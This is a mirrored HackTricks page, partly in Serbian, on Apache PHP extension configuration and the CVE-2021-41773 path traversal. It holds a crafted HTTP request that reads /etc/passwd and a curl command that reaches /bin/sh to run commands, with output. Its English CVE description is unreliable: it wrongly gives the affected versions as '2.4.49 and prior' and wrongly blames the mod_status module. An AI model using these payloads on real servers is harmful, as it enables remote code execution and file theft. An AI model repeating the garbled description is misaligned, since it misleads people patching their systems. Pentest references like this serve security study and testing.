mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 15:12:11 +00:00
73 lines
4.2 KiB
Markdown
73 lines
4.2 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Drugi načini podrške HackTricks-u:
|
|
|
|
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
|
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
|
|
|
</details>
|
|
|
|
|
|
# Izvršivi PHP ekstenzije
|
|
|
|
Proverite koje ekstenzije izvršava Apache server. Da biste ih pretražili, možete izvršiti:
|
|
```bash
|
|
grep -R -B1 "httpd-php" /etc/apache2
|
|
```
|
|
Takođe, neka mesta gde možete pronaći ovu konfiguraciju su:
|
|
```bash
|
|
/etc/apache2/mods-available/php5.conf
|
|
/etc/apache2/mods-enabled/php5.conf
|
|
/etc/apache2/mods-available/php7.3.conf
|
|
/etc/apache2/mods-enabled/php7.3.conf
|
|
```
|
|
# CVE-2021-41773
|
|
|
|
## Description
|
|
|
|
Apache HTTP Server (httpd) is an open-source web server software. A vulnerability, known as CVE-2021-41773, has been discovered in Apache HTTP Server versions 2.4.49 and prior. This vulnerability allows remote attackers to execute arbitrary code and gain unauthorized access to the targeted system.
|
|
|
|
## Exploitation
|
|
|
|
To exploit this vulnerability, an attacker can send a specially crafted HTTP request to the server, targeting the vulnerable mod_status module. By including a path traversal sequence in the request, the attacker can access files outside the web root directory.
|
|
|
|
The following request can be used to exploit the vulnerability:
|
|
|
|
```http
|
|
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
|
Host: example.com
|
|
```
|
|
|
|
This request attempts to access the `/etc/passwd` file, which contains sensitive system information, such as user account details.
|
|
|
|
## Mitigation
|
|
|
|
To mitigate this vulnerability, it is recommended to upgrade to Apache HTTP Server version 2.4.50 or later. Additionally, it is advised to restrict access to the mod_status module or disable it if not required.
|
|
|
|
## References
|
|
|
|
- [CVE-2021-41773 - Apache HTTP Server Path Traversal Vulnerability](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773)
|
|
- [Apache HTTP Server Documentation](https://httpd.apache.org/docs/)
|
|
```bash
|
|
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
|
|
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|
Linux
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Drugi načini podrške HackTricks-u:
|
|
|
|
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
|
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
|
|
|
</details>
|